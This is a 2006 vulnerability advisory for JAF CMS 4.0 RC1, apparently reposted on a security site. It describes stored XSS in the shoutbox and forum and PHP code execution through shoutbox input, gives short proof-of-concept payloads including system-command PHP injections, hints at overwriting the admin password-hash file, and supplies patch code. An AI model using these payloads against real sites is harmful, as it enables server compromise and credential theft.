JAF CMS 4.0 RC1 multiple vulnerabilities

2006.10.03
Credit: NanoyMaster
Risk: High
Local: No
Remote: Yes
CWE: N/A

######################################################################## ########## ## ## _ _ _ _ ## ## Hacker: NanoyMaster ## /|| | || / || ## ## Exploit: JAF CMS ## / || |\| || / || ## ## Version: 4.0 RC1 ## || | || |/| || / ## ## ## ||_| _||_| |_||/ ## ######################################################################## ########## ## vulnerabilities: XSS in shoutbox ## ## PHP execution ## ## XSS in forum ## ## ## ######################################################################## ########## ## m/___Props___m/ ## ## z3r0phr34k ## ## System_Meltdown ## ## THK-GEO & THK-h3x ## ## All of Exploitarians ## ######################################################################## ########## //---------------------------------------------------------------------- --------// // XSS in shoutbox // //---------------------------------------------------------------------- --------// Self explanitory... in the message body put: <script>alert('hi')</script> Error: module/shout/jafshout.php Line: 168 - 202 187 - 191 { $message = preg_replace('/"/','',$_POST['message']); $message = preg_replace("/>/",">",$_POST['message']); $message = preg_replace("/</","<",$_POST['message']); $message = str_replace("onmouse","",$_POST['message']); $message = str_replace("//","edited",$_POST['message']); } change the relevent lines to look like the following, bar the first $_POST['message']. 187 - 191 { $message = preg_replace('/"/','',$message); $message = preg_replace("/>/",">",$message); $message = preg_replace("/</","<",$message); $message = str_replace("onmouse","",$message); $message = str_replace("//","edited",$message); } etc etc. *note* This should be implemented on all of the variables stored to the flat-file module/files/shout *end note* //---------------------------------------------------------------------- --------// // PHP execution // //---------------------------------------------------------------------- --------// Yet again in the shoutbox type something like: Windoze) <?php system(dir); ?> Linux) <?php system(ls -la); ?> you could see how usefull this could be ;) possably overwright admin/data_inc.php (where the admin's password hash is) :p Error: module/shout/jafshout.php Line: 168 - 202 Patch: (see above code) //---------------------------------------------------------------------- --------// // XSS in forum // //---------------------------------------------------------------------- --------// Self explanitory... in the message body put: <script>alert('hi')</script> Error: module/forum/topicwin.php Line: 112- 123 112 - 117 { $n_topic["name"]=$name; $n_topic["email"]=$email; $n_topic["title"]=$title; $n_topic["date"]=$date; $n_topic["ldate"]=$date; $n_topic["lname"]=$name; } change the relevent lines to look like the following. 112 - 117 { $n_topic["name"]=htmlentities($name, ENT_QUOTES); $n_topic["email"]=htmlentities($email, ENT_QUOTES); $n_topic["title"]=htmlentities($title, ENT_QUOTES); $n_topic["date"]=htmlentities($date, ENT_QUOTES); $n_topic["ldate"]=htmlentities($date, ENT_QUOTES); $n_topic["lname"]=htmlentities($name, ENT_QUOTES); } etc etc. //---------------------------------------------------------------------- --------// // End // //---------------------------------------------------------------------- --------//


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top